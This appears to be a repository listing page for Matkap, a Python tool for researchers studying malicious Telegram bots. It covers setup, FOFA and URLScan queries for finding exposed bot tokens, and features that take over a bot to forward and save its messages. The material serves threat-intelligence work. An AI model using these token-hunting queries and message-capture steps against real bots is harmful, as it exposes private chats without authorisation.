Matkap: A Python Tool to Hunt Down Malicious Telegram Bots

Matkap: A Python Tool to Hunt Down Malicious Telegram Bots

Summary

Matkap is an open-source Python tool designed for cybersecurity professionals to analyze and identify malicious Telegram bots. It offers features like integration with FOFA and URLScan for token hunting, message forwarding, and log export. This tool is valuable for security research and understanding Telegram bot interactions.

Repository Info

Updated on October 12, 2025
View on GitHub

Tags

ctiintelligencemalwareosinttelegrampythoncybersecuritybot-analysis

Click on any tag to explore related repositories

Introduction

Matkap is a powerful open-source Python tool developed by 0x6rss, specifically designed to hunt down and analyze malicious Telegram bots. Intended for cybersecurity professionals and researchers, Matkap provides functionalities to investigate bot interactions, identify potential threats, and gather intelligence. It integrates with external services like FOFA and URLScan to broaden its scanning capabilities for exposed bot tokens and chat IDs. Please note, Matkap is for educational and research purposes only, and users must adhere to ethical guidelines and legal regulations.

Installation

To get Matkap up and running, follow these steps:

Prerequisites

  • Python 3.7+ installed on your system.
  • Pip for package management.
  • Telegram API credentials: Obtain api_id, api_hash, and phone_number from my.telegram.org/apps.
  • (Optional) FOFA Account and URLScan Account if you plan to use their scanning features. You will need FOFA_EMAIL, FOFA_KEY, and URLSCAN_API_KEY.

Setup

  1. Clone the repository: 
    git clone https://github.com/0x6rss/matkap.git
  2. Navigate into the project folder: 
    cd matkap
  3. Create a .env file:

    In the matkap directory, create a file named .env and populate it with your Telegram API credentials and optional FOFA/URLScan keys:

    TELEGRAM_API_ID=123456
TELEGRAM_API_HASH=your_api_hash
TELEGRAM_PHONE=+90000000000

# (Optional) For FOFA & URLScan:
FOFA_EMAIL=your_fofa_email
FOFA_KEY=your_fofa_key
URLSCAN_API_KEY=your_urlscan_api_key
  4. Install dependencies: 
    pip install -r requirements.txt
  5. Run Matkap: 
    python matkap.py

    Upon first run, Telegram will send a login code to your phone, which you'll need to enter in the terminal.

Examples

Matkap offers a user-friendly interface with several key functionalities:

  • Start Attack: Input a malicious bot token and chat ID to begin monitoring.
  • Forward All Messages: Iterate through and forward older messages from a specified chat, with options to stop or resume.
  • Hunt With FOFA: Search for exposed Telegram Bot Tokens and Chat IDs on websites indexed by FOFA, specifically looking for body="api.telegram.org". Results are logged in the Process Log.
  • Hunt With URLScan: Similar to FOFA, this feature uses URLScan to find exposed tokens and chat IDs referencing domain:api.telegram.org.
  • Export captured messages: All captured Telegram messages are automatically saved to the "captured_messages" directory for later analysis.

Why Use Matkap?

Matkap is an invaluable asset for:

  • Cyber Threat Intelligence (CTI): Gaining insights into the operational methods of malicious Telegram bots.
  • OSINT Investigations: Discovering exposed bot tokens and chat IDs that could lead to further intelligence.
  • Security Research: Analyzing bot behavior, message forwarding patterns, and potential data exfiltration.
  • Educational Purposes: Understanding the security landscape of messaging platforms and developing defensive strategies.

Links